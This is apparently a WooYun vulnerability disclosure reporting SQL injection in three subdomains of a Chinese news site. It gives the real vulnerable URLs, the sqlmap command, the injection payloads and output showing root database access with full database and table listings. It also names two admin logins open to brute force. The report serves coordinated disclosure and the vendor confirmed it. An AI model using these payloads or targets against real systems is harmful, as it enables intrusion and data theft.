当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2013-44193

漏洞标题: 大河网#3个分站存在SQL注射漏洞(root用户)

相关厂商: 大河网

漏洞作者: Mr.leo

提交时间: 2013-11-27 13:42

公开时间: 2014-01-11 13:43

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 注射技巧

1人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-27: 细节已通知厂商并且等待厂商处理中
2013-11-27: 厂商已经确认,细节仅向厂商公开
2013-12-07: 细节向核心白帽子及相关领域专家公开
2013-12-17: 细节向普通白帽子公开
2013-12-27: 细节向实习白帽子公开
2014-01-11: 细节向公众公开

简要描述:

大河网#3个分站存在SQL注射漏洞(root用户) 求RANK20

详细说明:

站点1:



http://jlb.96211.com 大河读者报俱乐部



id参数没有过滤,导致注射漏洞



http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398



sqlmap跑起来



sqlmap.py -u "http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398" --dbs --current-user --current-db



sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: Id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: Id=398 AND 9028=9028



Type: UNION query

Title: MySQL UNION query (NULL) - 12 columns

Payload: Id=398 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x

3a626f623a,0x4e584145674d79756773,0x3a6474613a), NULL, NULL, NULL, NULL, NULL, N

ULL, NULL#

---

[10:40:01] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL 5

[10:40:01] [INFO] fetching current user

current user: 'root@localhost'

[10:40:01] [INFO] fetching current database

current database: 'dahebao'

[10:40:01] [INFO] fetching database names

[10:40:01] [INFO] the SQL query used returns 17 entries

[10:40:01] [INFO] resumed: "information_schema"

[10:40:01] [INFO] resumed: "170"

[10:40:01] [INFO] resumed: "clubwap"

[10:40:01] [INFO] resumed: "cmswap"

[10:40:01] [INFO] resumed: "dahebao"

[10:40:01] [INFO] resumed: "dahevote"

[10:40:01] [INFO] resumed: "dvote"

[10:40:01] [INFO] resumed: "dvote_2"

[10:40:01] [INFO] resumed: "ebvote"

[10:40:01] [INFO] resumed: "guozheng"

[10:40:01] [INFO] resumed: "love"

[10:40:01] [INFO] resumed: "mysql"

[10:40:01] [INFO] resumed: "php168"

[10:40:01] [INFO] resumed: "phpcms"

[10:40:01] [INFO] resumed: "phpcms2010"

[10:40:01] [INFO] resumed: "test"

[10:40:01] [INFO] resumed: "tuan"



root用户



123.png





available databases [17]:

[*] 170

[*] clubwap

[*] cmswap

[*] dahebao

[*] dahevote

[*] dvote

[*] dvote_2

[*] ebvote

[*] guozheng

[*] information_schema

[*] love

[*] mysql

[*] php168

[*] phpcms

[*] phpcms2010

[*] test

[*] tuan



Database: dahebao

[48 tables]

+----------------+

| about_m |

| adm |

| am_tree |

| am_user |

| ar_advertise |

| ar_article |

| ar_articledata |

| ar_articletype |

| ar_catalog |

| ar_comment |

| ar_config |

| ar_file |

| ar_keywords |

| ar_links |

| ar_members |

| ar_message |

| ar_page |

| ar_tags |

| areas |

| baoliao |

| baoming |

| buycar_m |

| emaillm |

| emailsm |

| gmm |

| gmyes |

| hzshm |

| hzshs |

| jiuyou |

| kefu_m |

| keywd |

| link_m |

| liren |

| liuyan_text |

| mem_m |

| mem_store |

| news_m |

| pinpm |

| prodm |

| prodmpic |

| prodmpl |

| prodmtao |

| prodmwd |

| prods |

| toorder_m |

| toorderlw |

| wenda |

| xiaojizhe |

+----------------+



------------------------我是分割线----------------------------------



站点2:



http://dhtuan.96211.com 国政大河商城



同样是id参数没有过滤,导致注射漏洞



http://dhtuan.96211.com/Previous/SiteProd/ProdM_List.php?Id=432



跑sqlmap



Place: GET

Parameter: Id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: Id=432 AND 9896=9896



Type: UNION query

Title: MySQL UNION query (NULL) - 12 columns

Payload: Id=432 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6a617a3a,0x6a696253766

74c76434e,0x3a6e68663a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N

ULL, NULL#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: Id=432 AND SLEEP(5)

---

[12:42:09] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL 5.0.11

[12:42:09] [INFO] fetching current user

current user: 'root@localhost'

[12:42:09] [INFO] fetching current database

current database: 'guozheng'

[12:42:09] [INFO] fetching database names

[12:42:09] [INFO] the SQL query used returns 17 entries

[12:42:09] [INFO] resumed: "information_schema"

[12:42:09] [INFO] resumed: "170"

[12:42:10] [INFO] resumed: "clubwap"

[12:42:10] [INFO] resumed: "cmswap"

[12:42:10] [INFO] resumed: "dahebao"

[12:42:10] [INFO] resumed: "dahevote"

[12:42:10] [INFO] resumed: "dvote"

[12:42:10] [INFO] resumed: "dvote_2"

[12:42:10] [INFO] resumed: "ebvote"

[12:42:10] [INFO] resumed: "guozheng"

[12:42:10] [INFO] resumed: "love"

[12:42:10] [INFO] resumed: "mysql"

[12:42:10] [INFO] resumed: "php168"

[12:42:10] [INFO] resumed: "phpcms"

[12:42:10] [INFO] resumed: "phpcms2010"

[12:42:10] [INFO] resumed: "test"

[12:42:10] [INFO] resumed: "tuan"



同样是root用户



2.png





available databases [17]:

[*] 170

[*] clubwap

[*] cmswap

[*] dahebao

[*] dahevote

[*] dvote

[*] dvote_2

[*] ebvote

[*] guozheng

[*] information_schema

[*] love

[*] mysql

[*] php168

[*] phpcms

[*] phpcms2010

[*] test

[*] tuan



Database: guozheng

[35 tables]

+--------------+

| about_m |

| adm |

| am_tree |

| am_user |

| areas |

| baoming |

| buycar_m |

| buycar_m_jf |

| emaillm |

| emailsm |

| gmm |

| gmyes |

| hzshm |

| hzshs |

| kefu_m |

| keywd |

| link_m |

| liuyan_text |

| mem_m |

| mem_store |

| news_m |

| pinpm |

| prodm |

| prodm_jf |

| prodmpic |

| prodmpic_jf |

| prodmpl |

| prodmtao |

| prodmwd |

| prods |

| prods_jf |

| toorder_m |

| toorder_m_jf |

| toorderlw |

| wenda |

+--------------+



------------------------------我是分割线-------------------------------



站点3:



http://pw.96211.com 大河票务在线



id没有过滤,导致注射



http://pw.96211.com/Previous/SiteProd/ProdM_List_yc.php?Id=248



sqlmap跑起来



Place: GET

Parameter: Id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: Id=248 AND 4067=4067

---

[11:06:38] [INFO] testing MySQL

[11:06:51] [INFO] confirming MySQL

[11:07:13] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL >= 5.0.0

[11:07:13] [INFO] fetching current user

[11:07:13] [WARNING] running in a single-thread mode. Please consider usage of o

ption '--threads' for faster data retrieval

[11:07:13] [INFO] retrieved: root@localhost

current user: 'root@localhost'

[11:26:31] [INFO] fetching current database

[11:26:31] [INFO] retrieved: dahebao

current database: 'dahebao'

[11:36:11] [INFO] fetching database names

[11:36:11] [INFO] fetching number of databases

[11:36:11] [INFO] retrieved: 17

[11:37:51] [INFO] retrieved: information_schema

[12:01:25] [INFO] retrieved: 170

[12:06:14] [INFO] retrieved: clubwap

[12:16:03] [INFO] retrieved: cmswap

[12:24:34] [INFO] retrieved: dahebao

[12:34:16] [INFO] retrieved: dahevote



太慢了,没有深入。



root用户



3.png





附送2个后台,没有验证码,没有深入,存在被暴力破解。



http://dhfx.96211.com/Admin/Frame/LoginA.php

大河报读者俱乐部 96211 - 管理员入口



http://t.96211.com/manage/login.php

大河团 - 管理后台













漏洞证明:

已经证明。

修复方案:

1#过滤参数



2#屏蔽外网直接访问到管理后台



3#找洞很辛苦,求RANK20

版权声明:转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-11-27 13:44

厂商回复:

通知了合作单位。谢谢

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-11-27 15:14 | sun ( 实习白帽子 | Rank:76 漏洞数:12 )
    0

    3个洞连射才10分 -@-

    1# 回复此人
  2. 2013-11-27 15:16 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)
    0

    @大河网 求RANK给力哈

    2# 回复此人

登录后才能发表评论,请先 登录